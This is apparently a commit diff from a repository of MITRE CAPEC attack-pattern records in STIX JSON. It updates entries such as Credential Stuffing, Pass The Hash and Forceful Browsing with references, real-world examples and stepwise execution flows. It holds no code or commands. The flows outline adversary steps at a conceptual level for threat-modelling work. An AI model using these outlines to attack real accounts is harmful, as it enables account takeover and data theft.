adam/cti
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Version 3.3

Browse Source
This commit is contained in:
Rich Piazza
2020-08-19 09:28:15 -04:00
parent a7aedfdc39
commit 8a0789b428
2123 changed files with 21750 additions and 11287 deletions
Download Patch File Download Diff File Expand all files Collapse all files
capec/attack-pattern/attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6.json
+5 -4
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--839148e6-8714-4c06-abac-ee55fa335bf2",
"id": "bundle--1341a9cf-5d7d-4df5-a055-8e14698c8d06",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Forceful Browsing",
"description": "An attacker employs forceful browsing to access portions of a website that are otherwise unreachable through direct URL entry. Usually, a front controller or similar design pattern is employed to protect access to portions of a web application. Forceful browsing enables an attacker to access information, perform privileged operations and otherwise reach sections of the web application that have been improperly protected.",
"external_references": [
@@ -50,8 +50,9 @@
]
},
"x_capec_example_instances": [
"\n <xhtml:p>A bulletin board application provides an administrative interface at admin.aspx when the user logging in belongs to the administrators group.</xhtml:p>\n <xhtml:p>An attacker can access the admin.aspx interface by making a direct request to the page. Not having access to the interface appropriately protected allows the attacker to perform administrative functions without having to authenticate himself in that role.</xhtml:p>\n "
"\n <xhtml:p>A bulletin board application provides an administrative interface at admin.aspx when the user logging in belongs to the administrators group.</xhtml:p>\n <xhtml:p>An attacker can access the admin.aspx interface by making a direct request to the page. Not having access to the interface appropriately protected allows the attacker to perform administrative functions without having to authenticate themself in that role.</xhtml:p>\n "
],
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Spider: </b>Using an automated tool, an attacker follows all public links on a web site. They record all the links they find.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Use a spidering tool to follow and record all links.</td></tr><tr><td>Use a proxy tool to record all links visited during a manual traversal of the web application.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Attempt well-known or guessable resource locations: </b>Using an automated tool, an attacker requests a variety of well-known URLs that correspond to administrative, debugging, or other useful internal actions. They record all the positive responses from the server.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Use a spidering tool to follow and record attempts on well-known URLs.</td></tr><tr><td>Use a proxy tool to record all links visited during a manual traversal of attempts on well-known URLs.</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Use unauthorized resources: </b>By visiting the unprotected resource, the attacker makes use of unauthorized functionality.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Access unprotected functions and execute them.</td></tr></tbody></table><li> <p> <b>View unauthorized data: </b>The attacker discovers and views unprotected sensitive data.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Direct request of protected pages that directly access database back-ends. (e.g., list.jsp, accounts.jsp, status.jsp, etc.)</td></tr></tbody></table></ol></div>",
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"The forcibly browseable pages or accessible resources must be discoverable and improperly protected."
@@ -64,7 +65,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--0082c733-5245-47ca-a349-6c9fe34114f1.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--b6853d6e-dc33-454c-af80-1e7a298eb45a",
"id": "bundle--207c3285-9ebf-477d-9c2d-76ee9ed67a6a",
"spec_version": "2.0",
"objects": [
{
@@ -23,7 +23,7 @@
],
"x_capec_abstraction": "Meta",
"x_capec_status": "Deprecated",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--92d428da-86d8-4437-a371-22de560b1564",
"id": "bundle--0a4e5b52-a27b-48c8-bccd-6bad3a3a56bc",
"spec_version": "2.0",
"objects": [
{
@@ -28,7 +28,7 @@
],
"x_capec_abstraction": "Standard",
"x_capec_status": "Draft",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--2be836ed-2e59-4b1a-a2d2-b9ca5af935f1",
"id": "bundle--48ee9e14-9c55-43b2-85c2-0abab71a9e3f",
"spec_version": "2.0",
"objects": [
{
@@ -64,7 +64,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--0123fa83-2d47-4398-85f1-30ce114abb9a.json
+15 -3
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--cdd8ebb5-99ef-4afa-9723-0e7ed7717e9d",
"id": "bundle--df56e6c7-0230-48e4-a3f5-17edc7ce1556",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--0123fa83-2d47-4398-85f1-30ce114abb9a",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Malicious Software Download",
"description": "An attacker uses deceptive methods to cause a user or an automated process to download and install dangerous code that originates from an attacker controlled source. There are several variations to this strategy of attack.",
"external_references": [
@@ -21,6 +21,18 @@
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/494.html",
"external_id": "CWE-494"
},
{
"source_name": "ATTACK",
"description": "Browser Extensions",
"url": "https://attack.mitre.org/wiki/Technique/T1176",
"external_id": "T1176"
},
{
"source_name": "ATTACK",
"description": "User Execution:Malicious File",
"url": "https://attack.mitre.org/wiki/Technique/T1204/002",
"external_id": "T1204.002"
}
],
"object_marking_refs": [
@@ -29,7 +41,7 @@
"x_capec_abstraction": "Standard",
"x_capec_status": "Draft",
"x_capec_typical_severity": "Very High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--012db73f-2f3c-49f3-bdf3-12ec3eee01ce.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--5f1d14b4-ecf8-4e81-a7ef-105df8a76cc8",
"id": "bundle--a7b1dc1c-f58d-438f-8787-5758c3154628",
"spec_version": "2.0",
"objects": [
{
@@ -40,7 +40,7 @@
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--014e5fc2-7564-4775-94aa-220601522b05.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--57136cd7-39b7-4994-954e-e6488249da84",
"id": "bundle--6bd343c9-5a8d-40e3-85de-c540ef791af7",
"spec_version": "2.0",
"objects": [
{
@@ -35,7 +35,7 @@
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--0017d01a-bb05-417b-b73c-ef7cdf6a887c",
"id": "bundle--adba44c6-a72f-4f28-b422-2bf0c7785edf",
"spec_version": "2.0",
"objects": [
{
@@ -47,7 +47,7 @@
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113.json
+9 -3
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--97da0eb8-515f-4ada-8d49-2d86dd5bbff5",
"id": "bundle--2c5c4260-30e1-4cfd-bda4-c46016c1adc9",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2017-08-04T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Resource Leak Exposure",
"description": "An adversary utilizes a resource leak on the target to deplete the quantity of the resource available to service legitimate requests. Resource leaks most often come in the form of memory leaks where memory is allocated but never released after it has served its purpose, however, theoretically, any other resource that can be reserved can be targeted if the target fails to release the reservation when the reserved resource block is no longer needed. In this attack, the adversary determines what activity results in leaked resources and then triggers that activity on the target. Since some leaks may be small, this may require a large number of requests by the adversary. However, this attack differs from a flooding attack in that the rate of requests is generally not significant. This is because the lost resources due to the leak accumulate until the target is reset, usually by restarting it. Thus, a resource-poor adversary who would be unable to flood the target can still utilize this attack. Resource depletion through leak differs from resource depletion through allocation in that, in the former, the adversary may not be able to control the size of each leaked allocation, but instead allows the leak to accumulate until it is large enough to affect the target's performance. When depleting resources through allocation, the allocated resource may eventually be released by the target so the attack relies on making sure that the allocation size itself is prohibitive of normal operations by the target.",
"external_references": [
@@ -21,6 +21,12 @@
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/404.html",
"external_id": "CWE-404"
},
{
"source_name": "ATTACK",
"description": "Endpoint Denial of Service:Application or System Exploitation",
"url": "https://attack.mitre.org/wiki/Technique/T1499/004",
"external_id": "T1499.004"
}
],
"object_marking_refs": [
@@ -42,7 +48,7 @@
],
"x_capec_status": "Stable",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--02570621-96aa-4525-b782-8e3939affac3.json
+3 -3
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--96679e2e-c383-4ad7-b3c9-3cdccfd17e4c",
"id": "bundle--91c67660-5b89-459e-971b-a3fac64e34c9",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2015-11-09T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Malicious Software Implanted",
"description": "An attacker implants malicious software into the system in the supply chain distribution channel, with purpose of causing malicious disruption or allowing for additional compromise when the system is deployed.",
"external_references": [
@@ -40,7 +40,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--03093798-f245-4ed2-a085-88e69d303b11.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--645b079a-4c1a-4f03-a7d9-14872910271b",
"id": "bundle--09ca413c-7c3b-4ad0-b37a-9bf38b5b896a",
"spec_version": "2.0",
"objects": [
{
@@ -23,7 +23,7 @@
],
"x_capec_abstraction": "Meta",
"x_capec_status": "Deprecated",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a.json
+127
View File
@@ -0,0 +1,127 @@
{
"type": "bundle",
"id": "bundle--56d32fd3-8189-4b2c-ac67-4b1be3fd30ae",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2020-07-30T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Credential Stuffing",
"description": "\n <xhtml:p>An adversary tries known username/password combinations against different systems, applications, or services to gain additional authenticated access. Credential Stuffing attacks rely upon the fact that many users leverage the same username/password combination for multiple systems, applications, and services. Attacks of this kind often target management services over commonly used ports such as SSH, FTP, Telnet, LDAP, Kerberos, MySQL, and more. Additional targets include Single Sign-On (SSO) or cloud-based applications/services that utilize federated authentication protocols, and externally facing applications. The primary goal of Credential Stuffing is to achieve lateral movement and gain authenticated access to additional systems, applications, and/or services. A successfully executed Credential Stuffing attack could result in the adversary impersonating the victim or executing any action that the victim is authorized to perform. If the password obtained by the adversary is used for multiple systems, accounts, and/or services, this attack will be successful (in the absence of other mitigations).</xhtml:p>\n <xhtml:p>Although not technically a brute force attack, Credential Stuffing attacks can function as such if an adversary possess multiple known passwords for the same user account. This may occur in the event where an adversary obtains user credentials from multiple sources or if the adversary obtains a user's password history for an account.</xhtml:p>\n <xhtml:p>Credential Stuffing attacks are similar to Password Spraying attacks (CAPEC-565) regarding their targets and their overall goals. However, Password Spraying attacks do not have any insight into known username/password combinations and instead leverage common or expected passwords. This also means that Password Spraying attacks must avoid inducing account lockouts, which is generally not a worry of Credential Stuffing attacks. Password Spraying attacks may additionally lead to Credential Stuffing attacks, once a successful username/password combination is discovered.</xhtml:p>\n ",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/600.html",
"external_id": "CAPEC-600"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/522.html",
"external_id": "CWE-522"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/307.html",
"external_id": "CWE-307"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/308.html",
"external_id": "CWE-308"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/309.html",
"external_id": "CWE-309"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/262.html",
"external_id": "CWE-262"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/263.html",
"external_id": "CWE-263"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/654.html",
"external_id": "CWE-654"
},
{
"source_name": "ATTACK",
"description": "Brute Force:Credential Stuffing",
"url": "https://attack.mitre.org/wiki/Technique/T1110/004",
"external_id": "T1110.004"
},
{
"source_name": "reference_from_CAPEC",
"description": "Alert (TA18-086A): Brute Force Attacks Conducted by Cyber Actors, 2018--03---27, Cybersecurity and Infrastructure Security Agency (CISA)",
"url": "https://www.us-cert.gov/ncas/alerts/TA18-086A",
"external_id": "REF-567"
},
{
"source_name": "reference_from_CAPEC",
"description": "Credential stuffing, Open Web Application Security Project (OWASP)",
"url": "https://owasp.org/www-community/attacks/Credential_stuffing",
"external_id": "REF-568"
},
{
"source_name": "reference_from_CAPEC",
"description": "Jessica Silver-Greenberg, Matthew Goldstein, Nicole Perlroth, JPMorgan Chase Hacking Affects 76 Million Households, 2014--10---02, The New York Times",
"url": "https://dealbook.nytimes.com/2014/10/02/jpmorgan-discovers-further-cyber-security-issues/",
"external_id": "REF-569"
}
],
"object_marking_refs": [
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
],
"x_capec_abstraction": "Standard",
"x_capec_consequences": {
"Access_Control": [
"Gain Privileges"
],
"Authentication": [
"Gain Privileges"
],
"Authorization": [
"Read Data"
],
"Confidentiality": [
"Gain Privileges",
"Read Data"
],
"Integrity": [
"Modify Data"
]
},
"x_capec_example_instances": [
"A user leverages the password \"Password123\" for a handful of application logins. An adversary obtains a victim's username/password combination from a breach of a social media application and executes a Credential Stuffing attack against multiple banking and credit card applications. Since the user leverages the same credentials for their bank account login, the adversary successfully authenticates to the user's bank account and transfer money to an offshore account.",
"In October 2014 J.P. Morgan's Corporate Challenge website was breached, resulting in adversaries obtaining multiple username/password pairs. A Credential Stuffing attack was then executed against J.P. Morgan Chase, which resulted in over 76 million households having their accounts compromised."
],
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Acquire known credentials: </b>The adversary must obtain known credentials in order to access the target system, application, or service.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>An adversary purchases breached username/password combinations or leaked hashed passwords from the dark web.</td></tr><tr><td>An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.</td></tr><tr><td>An adversary conducts a sniffing attack to steal credentials as they are transmitted.</td></tr><tr><td>An adversary gains access to a database and exfiltrates password hashes.</td></tr><tr><td>An adversary examines outward-facing configuration and properties files to discover hardcoded credentials.</td></tr></tbody></table><li> <p> <b>Determine target's password policy: </b>Determine the password policies of the target system/application to determine if the known credentials fit within the specified criteria.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Determine minimum and maximum allowed password lengths.</td></tr><tr><td>Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).</td></tr><tr><td>Determine account lockout policy (a strict account lockout policy will prevent brute force attacks if multiple passwords are known for a single user account).</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Attempt authentication: </b>Try each username/password combination until the target grants access.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Manually or automatically enter each username/password combination through the target's interface.</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Impersonate: </b>An adversary can use successful experiments or authentications to impersonate an authorized user or system or to laterally move within a system or application</p></li><li> <p> <b>Spoofing: </b>Malicious data can be injected into the target system or into a victim user's system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks.</p></li><li> <p> <b>Data Exfiltration: </b>The adversary can obtain sensitive data contained within the system or application.</p></li></ol></div>",
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"The system/application uses one factor password based authentication, SSO, and/or cloud-based authentication.",
"The system/application does not have a sound password policy that is being enforced.",
"The system/application does not implement an effective password throttling mechanism.",
"The adversary possesses a list of known user accounts and corresponding passwords that may exist on the target."
],
"x_capec_resources_required": [
"A machine with sufficient resources for the job (e.g. CPU, RAM, HD).",
"A known list of username/password combinations.",
"A custom script that leverages the credential list to launch the attack."
],
"x_capec_skills_required": {
"Low": "A Credential Stuffing attack is very straightforward."
},
"x_capec_status": "Stable",
"x_capec_typical_severity": "High",
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--056a463d-6303-438e-a43f-992cee52fb95.json
+87 -10
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--a052755b-06b1-4d81-b7da-1ca6d5cd737c",
"id": "bundle--6e7f03a0-e94c-43fa-98dc-c6a2a6b8fe38",
"spec_version": "2.0",
"objects": [
{
@@ -8,9 +8,9 @@
"id": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2018-07-31T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Use of Captured Hashes (Pass The Hash)",
"description": "An adversary uses stolen hash values for a user's credentials (username and password) to access systems managed under the same credential framwork that leverage the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols. When authenticating via LM or NTLM, the hashed credentials' associated plaintext credentials are not requried for successful authentication. Therefore, if an adversary can obtain the hashed credentials of a user, he can then pass these hash values to the server or service to authenticate without needing to brute-force the hashes to obtain their cleartext values. The adversary can then impersonate the user and laterally move within the network. This technique can be performed against any operating system which leverages the LM or NTLM protocols.",
"description": "An adversary obtains (i.e. steals or purchases) legitimate Windows domain credential (e.g. userID and password) hash values to access systems within the domain that leverage the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols. When authenticating via LM or NTLM, an authenticating account's plaintext credentials are not required by the protocols for successful authentication. Instead, the hashed credentials are used to determine if an authentication attempt is valid. If an adversary can obtain an account's hashed credentials, the hash values can then be passed to a system or service to authenticate, without needing to brute-force the hashes to obtain their cleartext values. Successful Pass The Hash attacks result in the adversary fully authenticating as the targeted account, which can further allow the adversary to laterally move within the network, impersonate a legitimate user, and/or download/install malware to systems within the domain. This technique can be performed against any operating system that leverages the LM or NTLM protocols even if the operating system is not Windows-based, since these systems/accounts may still authenticate to a Windows domain.",
"external_references": [
{
"source_name": "capec",
@@ -21,6 +21,62 @@
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/522.html",
"external_id": "CWE-522"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/836.html",
"external_id": "CWE-836"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/308.html",
"external_id": "CWE-308"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/294.html",
"external_id": "CWE-294"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/308.html",
"external_id": "CWE-308"
},
{
"source_name": "ATTACK",
"description": "Use Alternate Authentication Material:Pass The Hash",
"url": "https://attack.mitre.org/wiki/Technique/T1550/002",
"external_id": "T1550.002"
},
{
"source_name": "reference_from_CAPEC",
"description": "Dan Goodin, Attackers can use Zoom to steal users\u2019 Windows credentials with no warning, 2020--04---01, Ars Technica",
"url": "https://arstechnica.com/information-technology/2020/04/unpatched-zoom-bug-lets-attackers-steal-windows-credentials-with-no-warning/",
"external_id": "REF-575"
},
{
"source_name": "reference_from_CAPEC",
"description": "Mor Levi, Assaf Dahan, Amit Serper, Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers, 2019--06---25, CyberReason",
"url": "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers",
"external_id": "REF-580"
},
{
"source_name": "reference_from_CAPEC",
"description": "Mitigating Pass-the-Hash and Other Credential Theft v2, Microsoft Corporation",
"url": "https://docs.microsoft.com/en-us/previous-versions/dn785092(v=msdn.10)?redirectedfrom=MSDN",
"external_id": "REF-581"
},
{
"source_name": "reference_from_CAPEC",
"description": "How Pass-the-Hash works, Microsoft Corporation",
"url": "https://docs.microsoft.com/en-us/previous-versions/dn785092(v=msdn.10)?redirectedfrom=MSDN",
"external_id": "REF-582"
},
{
"source_name": "reference_from_CAPEC",
"description": "Bashar Ewaida, Pass-the-hash attacks: Tools and Mitigation, 2010--02---23, The SANS Institute",
"url": "https://www.sans.org/reading-room/whitepapers/testing/paper/33283",
"external_id": "REF-583"
}
],
"object_marking_refs": [
@@ -28,22 +84,43 @@
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Integrity": [
"Access_Control": [
"Gain Privileges"
],
"Authentication": [
"Gain Privileges"
],
"Authorization": [
"Read Data"
],
"Confidentiality": [
"Gain Privileges",
"Read Data"
],
"Integrity": [
"Modify Data"
]
},
"x_capec_likelihood_of_attack": "Low",
"x_capec_example_instances": [
"Adversaries exploited the Zoom video conferencing application during the 2020 COVID-19 pandemic to exfiltrate Windows domain credential hash value pairs from a target system. The attack entailed sending Universal Naming Convention (UNC) paths within the Zoom chat window of an unprotected Zoom call. If the victim clicked on the link, their Windows usernames and the corresponding Net-NTLM-v2 hashes were sent to the address contained in the link. The adversary was then able to infiltrate and laterally move within the Windows domain by passing the acquired credentials to shared network resources. This further provided adversaries with access to Outlook servers and network storage devices. [REF-575]",
"Operation Soft Cell, which has been underway since at least 2012, leveraged a modified Mimikatz that dumped NTLM hashes. The acquired hashes were then used to authenticate to other systems within the network via Pass The Hash attacks. [REF-580]"
],
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Acquire known Windows credential hash value pairs: </b>The adversary must obtain known Windows credential hash value pairs of accounts that exist on the domain.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>An adversary purchases breached Windows credential hash value pairs from the dark web.</td></tr><tr><td>An adversary conducts a sniffing attack to steal Windows credential hash value pairs as they are transmitted.</td></tr><tr><td>An adversary gains access to a Windows domain system/files and exfiltrates Windows credential hash value pairs.</td></tr><tr><td>An adversary examines outward-facing configuration and properties files to discover hardcoded Windows credential hash value pairs.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Attempt domain authentication: </b>Try each Windows credential hash value pair until the target grants access.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Manually or automatically enter each Windows credential hash value pair through the target's interface.</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Impersonate: </b>An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the domain</p></li><li> <p> <b>Spoofing: </b>Malicious data can be injected into the target system or into other systems on the domain. The adversary can also pose as a legitimate domain user to perform social engineering attacks.</p></li><li> <p> <b>Data Exfiltration: </b>The adversary can obtain sensitive data contained within domain systems or applications.</p></li></ol></div>",
"x_capec_likelihood_of_attack": "Medium",
"x_capec_prerequisites": [
"The adversary needs to first obtain the hashed credentials of a user, via the use of a tool, prior to executing this attack.",
"The victim system must allow Lan Man or NT Lan Man authentication."
"The system/application is connected to the Windows domain.",
"The system/application leverages the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols.",
"The adversary possesses known Windows credential hash value pairs that exist on the target domain."
],
"x_capec_resources_required": [
"A list of known Window credential hash value pairs for the targeted domain."
],
"x_capec_skills_required": {
"High": "The adversary uses a third-party tool to obtain hashed credentials to execute the attack.",
"Low": "Determine if Lan Man and NT Lan Man authentication is allowed on the server."
"Low": "Once an adversary obtains a known Windows credential hash value pair, leveraging it is trivial."
},
"x_capec_status": "Stable",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f.json
+29 -4
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--ec85441c-ae7c-4dec-9522-5848f07bbacf",
"id": "bundle--ba6f329c-27a7-4080-b2e6-b04d79c18ac6",
"spec_version": "2.0",
"objects": [
{
@@ -8,9 +8,9 @@
"id": "attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2018-07-31T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Use of Captured Tickets (Pass The Ticket)",
"description": "An adversary uses stolen Kerberos tickets to access systems that leverage the Kerberos authentication protocol. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. An adversary can obtain any one of these tickets (e.g. Service Ticket, Ticket Granting Ticket, Silver Ticket, or Golden Ticket) to authenticate to a system without needing the account's credentials. Depending on the ticket obtained, the adversary may be able to access a particular resource or generate TGTs for any account within an Active Directory Domain.",
"description": "An adversary uses stolen Kerberos tickets to access systems/resources that leverage the Kerberos authentication protocol. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. An adversary can obtain any one of these tickets (e.g. Service Ticket, Ticket Granting Ticket, Silver Ticket, or Golden Ticket) to authenticate to a system/resource without needing the account's credentials. Depending on the ticket obtained, the adversary may be able to access a particular resource or generate TGTs for any account within an Active Directory Domain.",
"external_references": [
{
"source_name": "capec",
@@ -21,6 +21,28 @@
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/522.html",
"external_id": "CWE-522"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/294.html",
"external_id": "CWE-294"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/308.html",
"external_id": "CWE-308"
},
{
"source_name": "ATTACK",
"description": "Use Alternate Authentication Material:Pass The Ticket",
"url": "https://attack.mitre.org/wiki/Technique/T1550/003",
"external_id": "T1550.003"
},
{
"source_name": "reference_from_CAPEC",
"description": "BRONZE BUTLER Targets Japanese Enterprises, 2017--10---12, Secureworks\u00ae Counter Threat Unit\u2122 Threat Intelligence",
"url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
"external_id": "REF-584"
}
],
"object_marking_refs": [
@@ -32,6 +54,9 @@
"Gain Privileges"
]
},
"x_capec_example_instances": [
"Bronze Butler (also known as Tick), has been shown to leverage forged Kerberos Ticket Granting Tickets (TGTs) and Ticket Granting Service (TGS) tickets to maintain administrative access on a number of systems. [REF-584]"
],
"x_capec_likelihood_of_attack": "Low",
"x_capec_prerequisites": [
"The adversary needs physical access to the victim system.",
@@ -43,7 +68,7 @@
},
"x_capec_status": "Stable",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--0618a68a-c6e1-4370-82d3-c76fa2745905.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--ae43321d-dce8-4760-b904-a366518531f2",
"id": "bundle--fa7f02c2-1411-4c6c-b2f5-74d1b14f6b4c",
"spec_version": "2.0",
"objects": [
{
@@ -29,7 +29,7 @@
"x_capec_abstraction": "Detailed",
"x_capec_status": "Draft",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be.json
+52 -4
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--61494309-9e38-4396-ae0c-a94de1579501",
"id": "bundle--3e79cf89-5306-4c36-8623-10468c19dabd",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be",
